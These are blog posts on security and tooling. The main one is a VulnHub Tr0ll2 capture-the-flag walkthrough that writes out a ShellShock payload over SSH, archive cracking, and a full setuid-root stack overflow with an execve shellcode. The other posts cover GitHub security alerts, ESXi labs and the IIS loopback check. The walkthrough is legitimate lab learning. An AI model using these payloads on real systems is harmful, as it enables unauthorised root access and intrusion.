GitHub Security Alerts

I really love everything about security, and I'm really intrigued by the GitHub Security tab that is now present on your repositories. It is usually disabled by default.

Figure 1: GitHub Security tab on your repository

If you enable it, you start receiving suggestions based on the code that you check in to the repository; as an example, GitHub will scan your npm package manifests to find dependencies on libraries with known vulnerabilities.

When GitHub finds something that requires your attention, it puts a nice warning banner on your project, so the alert can hardly pass unnoticed.

Figure 2: Security alert warning banner

If you go to the Security tab you get a detailed list of the findings, so you can put a remediation plan in motion, or simply dismiss the ones you believe you can live with.

Figure 3: Summary of security issues for the repository

Clearly you can click on any issue to get a detailed description of the vulnerability, so you can decide whether you are going to fix it or simply dismiss it, because the issue is not relevant to you or there is no way you can work around the problem.

Figure 4: Detailed report of security issue

As you can notice in Figure 4, there is also a nice "Create Automated Security Fix" button in the upper right part of the page: not only is GitHub telling me where the vulnerability is, it can sometimes fix the code for me. Pressing the button simply creates a new pull request with the fix. How nice.

Figure 5: Pull request with the fix for the security issue

In this specific situation it is simply a vulnerable package that gets downloaded by npm install, and the change simply bumps the library to a version where the vulnerability has been fixed.

GitHub actually performs a security scan on project dependencies and can propose a remediation simply with nice pull requests.
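As a side note, if you want to run the same kind of check locally, recent versions of npm (6 or later) ship a similar feature. It is independent from GitHub's scan, just a handy complement:

$ npm audit          # report known vulnerabilities in the dependency tree
$ npm audit fix      # bump vulnerable packages where a compatible version exists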

Using pull requests is really nice, really in the spirit of GitHub. The overall experience is great; the only annoying part is that the analysis seems to be done on the master branch, and the proposed solution creates pull requests targeting master. While this is perfectly fine, the problem I have is that closing the pull request from the UI merges the commit onto master, effectively bypassing the GitFlow workflow.

Since I'm a big fan of the command line, I prefer to close that pull request manually, so I simply issue a fetch, identify the new branch (it has an annoyingly long name :)) and check it out as a hotfix branch:

$ git checkout -b hotfix/0.3.1 remotes/origin/dependabot/npm_and_yarn/CoreBasicSample/src/MyWonderfulApp.Service/UI/tar-2.2.2
Switched to a new branch 'hotfix/0.3.1'
Branch 'hotfix/0.3.1' set up to track remote branch 'dependabot/npm_and_yarn/CoreBasicSample/src/MyWonderfulApp.Service/UI/tar-2.2.2' from 'origin'.

With this command I simply check out the remote branch as hotfix/0.3.1, so I can then issue a git flow hotfix finish and push everything back to the repository.
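For completeness, the rest of the flow is the standard GitFlow hotfix closure; something along these lines, where the version follows the example above and the remote is assumed to be origin:

$ git flow hotfix finish 0.3.1      # merges the hotfix into master and develop and creates the tag
$ git push origin master develop    # push both branches back to GitHub
$ git push origin --tags            # push the new tag as well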

If you have a specific flow for hotfixes, like GitFlow, it is quite easy to close pull requests locally following your own process; GitHub will automatically detect that the PR is closed after the push.

Now the branch is correctly merged.

Figure 6: Pull request manually merged.

If you really like this process, you can simply ask GitHub to automatically create pull requests without your intervention. As soon as a security fix is present, a PR will be created.

Figure 7: You can ask to receive automated pull requests for all vulnerabilities

Et voilà, it is raining pull requests

Figure 8: A series of Pull requests made to resolve security risks

This raises another little issue: we have a single PR for each vulnerability, so if I want to apply all of them in a single big hotfix, I only need to manually start the hotfix, fetch all those branches from the repo and finally cherry-pick all the commits. This operation is easy because each pull request contains a single commit that fixes a single vulnerability. The sequence of commands is:

git flow hotfix start 0.3.2
git cherry-pick commit1
git cherry-pick commit2
git cherry-pick commit3
git flow hotfix finish 0.3.2

The final result is a hotfix created by cherry-picking three distinct PRs.

Figure 9: Three pull requests were closed using a simple cherry-pick

GitHub is really good at understanding that I cherry-picked the commits highlighted in yellow from the pull requests: all of them were automatically closed after the push.

Figure 10: My pull requests are correctly closed even if I cherry-picked all commits manually.

This functionality is really nice: even in this simple repository, with really few lines of code, it helped me reveal some npm dependencies with vulnerabilities and, most importantly, it gave me the solution so I could immediately put a remediation in place.

Gian Maria.

Exploiting VulnHub Tr0ll2 machine

This is an unusual post: it deals with how I exploited the Tr0ll2 machine from VulnHub. Practicing with real machines helps you put into practice some of the stuff you learn about security. It had been a really long time (almost 20 years) since I last immersed myself in security, and doing some exercises on these machines is a good way to spend a few hours :).

I run all these machines on VMware ESXi servers, in an isolated network, behind a router and a firewall, with a DNS server on my Kali Linux machine. I'm pretty cautious when I run this kind of machine on my network, so it is always good for me to have a completely separate network, isolated from my real work network. Thanks to VMware I can simply use the console to access a machine even if I cannot reach it directly through the network.

First of all I check the DHCP server leases to find the IP assigned to the Tr0ll machine, an easy task.

Figure 1: Just check the leases in /var/lib/dhcp/dhcpd.leases to find the IP of the Tr0ll2 machine

Now a simple nmap scan reveals ports 80, 21 and 22 open. Starting with port 80, I did some checks with Burp Suite, but I did not find anything useful, just the standard troll image.
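The scan itself was nothing fancy; something along these lines is enough (replace the placeholder with the IP found in the DHCP leases):

$ nmap -sV <target-ip>    # service and version detection on the default port range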

Figure 2: Nothing interesting in home page.

This type of machine does not need brute force, but remembering the first machine of the series, I checked robots.txt, which reveals a series of possible subdirectories. To avoid testing every entry manually, simply save the file and then use software like dirb or OWASP DirBuster to test every entry in the file.
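A minimal sketch with dirb, assuming the robots.txt entries have been saved to a local wordlist file (the file name here is hypothetical):

$ dirb http://<target-ip>/ robots_dirs.txt    # robots_dirs.txt contains one entry per line, copied from robots.txt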

Figure 3: Some directories found by dirbuster

In all four directories we find the very same image, but after saving all the images to disk, one is slightly larger than the others. Using the strings program you can notice a strange string embedded in that image.
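Spotting the odd one out and dumping its strings takes two commands; the file name below is hypothetical, use whatever you saved the images as:

$ ls -l                      # one of the downloaded images is slightly larger than the others
$ strings bigger_image.jpg   # the interesting string stands out among the binary garbage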

Figure 4: String embedded in the image.

After some attempts (I tried various things on the web site) comes the light at the end of the tunnel: maybe y0ur_self is some file or directory on the web server and, voilà, it is another hidden directory.

Figure 5: Content of the hidden folder, a file with answers.

Opening the file I found a list of encoded strings; it looks like Base64, but there are lots of internet sites that can try various encodings for you, to avoid losing time.

Figure 6: Ok, indeed it is a Base64 string :)

The first thing to do is convert all these Base64 strings into plain strings; a few lines of Python code solved the problem.

Figure 7: Decoding with Python; as you can see, I'm using Visual Studio Code for the task.

Once I had a nice file with lots of strings, the obvious thing to do was to try these passwords on SSH or FTP; sadly, nothing worked. I tried root as the user (I was pretty sure that was not the user, because it would be too easy), I tried the Tr0ll user (because of the username on the home page of the site), but nothing.

Now I need to admit I cheated: after being stuck for a while, and after hydra and various other tools to brute force both FTP and SSH, I searched for a hint on the internet :D

I was a little bit disappointed because the next step is not really logical: the FTP user is Tr0ll with Tr0ll as the password. I really did not expect such an easy solution.

Moving on, on the FTP server I found a single zip file, protected with a password. The nice list of decoded strings contains the password for the zip file.
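Figure 8 shows the cracking step; a dictionary attack with a tool like fcrackzip, using the decoded strings as the wordlist, does the job (the archive name here is hypothetical):

$ fcrackzip -u -D -p decoded.txt archive.zip    # -D/-p: dictionary mode with wordlist, -u: verify candidates with unzip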

Figure 8: Cracking zip file.

Inside the zip file there is another file, a nice RSA key, used to log into SSH.

Figure 9: Finally a key to login with SSH

I tried the user Tr0ll without any success; then, since the file is called noob, I tried the user noob (remembering the trick of the FTP) and it worked, but no console was available: I was kicked out immediately.
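The login attempt itself is the usual key-based one; remember to restrict the key permissions or ssh will refuse to use it:

$ chmod 600 noob
$ ssh -i noob noob@<target-ip>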

Figure 10: Trolled again :(

OK, now I need to understand why the SSH server kicks me out all the time; using the -v option I can ask for verbose diagnostics of what is happening between client and server.

Figure 11: Debug of my ssh connection

The output is not really informative, but I tried googling everything, especially a particular string, "remote: forced command", which suggested to me that the server somehow has a command whitelist. I found that it is possible to configure SSH to only execute certain commands, so I tried different commands, but nothing worked.

After some more time googling, I found that SSH forced commands can be vulnerable to ShellShock, so I was really excited and tried to open a shell exploiting the ShellShock bug.
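The well-known trick is to put a ShellShock payload in the command passed to ssh: with a forced command configured, the client command ends up in the SSH_ORIGINAL_COMMAND environment variable, and a vulnerable bash parsing the environment executes the injected function body. Roughly (exact quoting may need adjusting):

$ ssh -i noob noob@<target-ip> '() { :;}; /bin/bash'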

Figure 12: ShellShock worked and I was really trolled

HOORAY, ShellShock worked and I'm in, but I cannot use ls to list files: pwd works, some other commands work, but ls gives me permission denied. After browsing with find, for some reason I tried the dir command and, LOL, dir works like ls, as you can see in Figure 12. This was the most troll moment of this hack, I was really shocked :D

Once in, you can find some interesting folders.

Figure 13: Finally some interesting files

I found three distinct r00t files inside three folders; all of them are executables, but running them has the simple result of kicking me out of SSH for a while. After being puzzled for a bit, I realized that one of the files is bigger than the others, and that it is always in a different place :) This explains why all three kicked me out of SSH: I ran the file in door1, then door2, then door3, but probably it was always the same file. As for the images with strings inside, the file with the different size was probably the interesting one.

Figure 14: Solution is near

OK, now I'm really frustrated. The reason is: I've found a file that has setuid root and does nothing but output the string I give it as input; thus, the author expects me to perform a stack overflow exploit, because this is the typical test program also used in books like The Shellcoder's Handbook. Uff, it has been more than 15 years since I last smashed a stack, and a lot of stuff has changed with ASLR and other mitigations, so I decided to call it a day and give up; I'd had enough fun with the machine.

……
……

After a couple of days, I still had a bitter taste in my mouth: I was close to finishing the machine, I could not surrender. Thanks a lot to Pluralsight (you guys have tons of exceptional courses), I found a course on creating exploits with Metasploit, and the TOC revealed that it could be a refresher for my rusty buffer overflow knowledge. The course was great and it gave me all the tools to attempt an exploit. The r00t file is 32 bit, so I do not have to deal with a 64 bit stack; it turns out that it could be easier than I thought.

Step 1: use a Metasploit utility to create a payload that allows me to locate the offset that overwrites the EIP register. The utility is pattern_create.rb; given a length (in this example 300 chars) it generates a unique, non-repeating string that allows me to locate the right offset.
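Figure 15 shows it in action; on Kali the script usually lives under the Metasploit tree (the path may differ on other setups), and the output below is truncated:

$ /usr/share/metasploit-framework/tools/exploit/pattern_create.rb -l 300
Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2...    # unique, non-repeating pattern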

Figure 15: Pattern_create.rb in action.

Now I can launch the r00t program inside the gdb debugger (I have no fancy GUI debugger over SSH and ShellShock, but luckily I'm old enough to be familiar with command line debuggers). Just run gdb r00t, then after the debugger starts type run followed by the argument, using patterns of increasing length until you crash the program.
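Figure 16 shows the crash; in text form the session looks roughly like this (the pattern is truncated for readability, and the faulting address is the one discussed below):

$ gdb ./r00t
(gdb) run Aa0Aa1Aa2Aa3Aa4Aa5...    # paste the full 300-char pattern as the argument
Program received signal SIGSEGV, Segmentation fault.
0x6a413969 in ?? ()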

Figure 16: The debugger shows the crash and the instruction that causes the segmentation fault.

The situation is the following: I've overwritten the stack with the specific sequence of chars generated by pattern_create.rb, and the offending pointer is 0x6a413969, which is now the content of the EIP register, the next instruction pointer. Now I can use another tool called pattern_offset.rb.
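Figure 17 shows the result; the lookup is a single command (same path caveat as before):

$ /usr/share/metasploit-framework/tools/exploit/pattern_offset.rb -q 0x6a413969 -l 300
[*] Exact match at offset 268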

Figure 17: Pattern_offset allows me to easily find the offset.

As you can see in Figure 17, with Metasploit finding the offset is a breeze: the EIP overwrite location is at offset 268. Now I simply followed the instructions of the Pluralsight course, trying to gain a better understanding of what happened. Using Python it is really simple to generate a pattern to verify the assumption.
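Conceptually the verification pattern is just padding up to the offset, four recognizable bytes where EIP should land, and some filler for the stack. A quick one-liner version from within gdb, assuming the target's python is Python 2 (the filler length is arbitrary):

(gdb) run $(python -c 'print "A"*268 + "B"*4 + "C"*100')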

Figure 18: Creating a specific pattern to verify what is in memory

Using that specific pattern allows me to verify what is in stack memory after the buffer overflow.

Figure 19: Registers after buffer overflow

OK, the assumptions are right: the EBP register contains a sequence of A characters, then EIP contains a sequence of Bs, and this confirms that the offset is good. Now I dump the memory pointed to by the ESP register to verify what is on the stack, and I find all letter Cs. Everything is good and ready to run. I do one final test: instead of using all Cs after the EIP pointer, I put 40 bytes of \x90 (NOP instructions). Here is the result.

Figure 20: Memory layout pointed by esp after the overflow

As you can see from Figure 20, at the memory address pointed to by ESP (0xbffffb10) there are my 40 NOPs and then the letter Cs. Now I only need a payload; remembering The Shellcoder's Handbook, I searched for a simple execve shellcode on Exploit-DB, and the result is

"\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x89\xe2\x53\x89\xe1\xb0\x0b\xcd\x80"

This is really nice; I really love shellcode, it is almost magic because it is binary code that can be forced into a program to be executed. Now I verify again the layout of the memory after the overflow with this new code.

Figure 21: Buffer overflow is almost ready.

It is really important that you do this final run with the exact length of the payload. Now from Figure 21 I can easily see my 40-byte NOP sled starting at 0xbffffb60, and then my shellcode. As a first attempt I tried to overwrite EIP with 0xbffffb68 (Figure 22; remember that x86 is little endian); if everything is OK, after the overflow the execution will jump into my NOP sled and finally execute the shellcode, launching a new shell as root (remember that the r00t program has setuid root).
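Reconstructed from the numbers above, the final invocation looks more or less like what you see in Figure 22 (the return address 0xbffffb68 is written in little-endian byte order, and I'm again assuming Python 2 on the target):

$ ./r00t $(python -c 'print "A"*268 + "\x68\xfb\xff\xbf" + "\x90"*40 + "\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x89\xe2\x53\x89\xe1\xb0\x0b\xcd\x80"')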

Figure 22: Final shellcode

I was really excited and really surprised when it worked at the very first attempt. Many thanks to Gus Khawaja for his course, it gave me all the information that I needed.

Figure 23: I'm Groot :P

Gian Maria.

Azure DevOps and SecDevOps

One of the cool aspects of Azure DevOps is its extensibility through the Marketplace, and for security you can find a nice Marketplace add-in called OWASP ZAP (https://marketplace.visualstudio.com/items?itemName=kasunkodagoda.owasp-zap-scan) that can be used to automate OWASP ZAP tests against web applications.

You can also check this nice article on the Microsoft DevBlogs, https://devblogs.microsoft.com/premier-developer/azure-devops-pipelines-leveraging-owasp-zap-in-the-release-pipeline/, which explains how you can leverage OWASP ZAP analysis during a deployment with a release pipeline.

Really good stuff to read and use.

Using VMware machines when you have Hyper-V

There are lots of VMs containing demos, labs, etc. around the internet, and Hyper-V is surely not their primary target as a virtualization system. This is because it is present on desktop OSes only from Windows 8 onwards, it is not free (it is included in Windows Professional) and it is bound to Windows. If you have to create a VM to share on the internet, 99% of the time you want to target VMware or VirtualBox and a Linux guest system (no license needed). Since VirtualBox can run VMware machines with little problem, VMware is the de facto standard in this area.

Virtual machines with demos, labs, etc. that you find on the internet are 99% of the time targeted at the VMware platform.

In the past I struggled a lot with conversion tools that convert VMware disk formats to the Hyper-V format, but sometimes this does not work because the virtualized hardware of the two systems is really different.

If you really want to be productive, the only solution I've found is installing an ESXi server on an old machine, an approach that has given me lots of satisfaction. First of all, you can use VMware's standalone conversion tool to convert a VMware VM to the standard OVF format in a few minutes, then upload the image to your ESXi server and you are ready to go.
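Assuming the command line tool in Figure 1 is VMware's ovftool, the conversion is a one-liner (paths are hypothetical):

ovftool "C:\VMs\DemoLab\DemoLab.vmx" "C:\Export\DemoLab.ovf"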

Figure 1: A simple command line instruction converts the VM into OVF format

Figure 2: From the ESXi interface you can choose to create a new VM from an OVF file

Once you choose the OVF file and the disk file, you just need to specify some basic characteristics for the VM and then you can simply let the browser do the rest; your machine will be created on your ESXi node.

Figure 3: Your VM will be created directly from your browser.

The second advantage of ESXi is that it is a really mature and powerful virtualization system, available for free. The only drawback is that it needs a serious network card; it will not work with a crappy card integrated into a consumer motherboard. For my ESXi test instance I used my old i7-2600K with a standard Asus P8P67 motherboard (overclocked), and then I spent a few bucks (approximately 50€) to buy a used 4x Gigabit network card. This gives me four independent NICs, with a decent network chip, each one running at 1 Gbit. Used cards are really cheap, especially because there are no drivers for the latest operating systems, so they get thrown away on eBay for a few bucks. When you are using a virtual machine to test something that involves networking, you will thank ESXi and a decent multi-NIC card, because you can create real network topologies, like having three machines each using a different NIC and potentially connected to a different router / switch to test a real production scenario.

ESXi NIC virtualization is FAR more powerful than VirtualBox or even VMware Workstation when installed with a really powerful NIC. Combined with a multi-NIC card, you have the ability to simulate real network topologies.

If you are using Linux machines, the VMware environment has another great advantage over Hyper-V: it supports all resolutions. You are not limited to Full HD with manual editing of the GRUB configuration; you can change your resolution from the Linux control panel or directly enable live resizing with the Remote Console available in ESXi.

If you really want to create a test lab, especially if you want to do security testing, having one or more ESXi hosts is something that pays off a lot in the long run.

Gian Maria

The Dreadful IIS Loopback Check

This is something that bites me from time to time, both as a TFS consultant and when I'm developing code. The problem is the following: you have a site hosted in IIS on the computer you are logged into, the site uses Windows authentication, but you cannot log in using a FQDN, only with localhost.

This is a security feature, because it avoids a reflection attack if the machine gets compromised. Sometimes this is annoying when you develop, because you usually use your local IIS to host the site while you are developing, accessing it with localhost; then it becomes necessary to verify that everything works with real site names. For this reason I usually modify my hosts file to create an alias like www.myproduct.local that points to 127.0.0.1, and here come the problems.
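The hosts entry itself is nothing special; on Windows the file lives in %SystemRoot%\System32\drivers\etc\hosts:

127.0.0.1    www.myproduct.local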

If you use Forms authentication in ASP.NET you are ready to go, but if you enable Windows authentication, the symptom is that your browser keeps asking for a password, because you keep getting a 401 response.

A typical symptom of the loopback check is a site that does not accept Windows authentication when accessed with a FQDN, but works perfectly using localhost.

If you legitimately want www.myproduct.local to point to localhost, and you want to use your NTLM/Kerberos credentials, you can follow the instructions at this link. I really like the answer in that link, because I've found many other places that suggest disabling the loopback check entirely (a wrong choice from a security point of view). That link points you to the right solution: specifying only the FQDN names that you want to exclude from the loopback check. In my situation I can exclude www.myproduct.local while maintaining the security check for everything else.
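The mechanism behind that answer, if I recall correctly, is the BackConnectionHostNames multi-string value documented in Microsoft KB896861; a sketch with reg.exe, to be run as administrator and followed by an IIS restart:

reg add "HKLM\SYSTEM\CurrentControlSet\Control\Lsa\MSV1_0" /v BackConnectionHostNames /t REG_MULTI_SZ /d "www.myproduct.local"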

If you have problems accessing a TFS instance from the server where the Application Tier is installed, do not disable the loopback check; browse from another computer or disable the check only for the real FQDN name.

Pretty please, resist the urge to disable security features, especially if this is your Team Foundation Server production instance. Avoid accessing the web interface from the AT, or disable the loopback check only for the real FQDN, but avoid turning off a security feature (like the loopback check) entirely on your production server.

Gian Maria.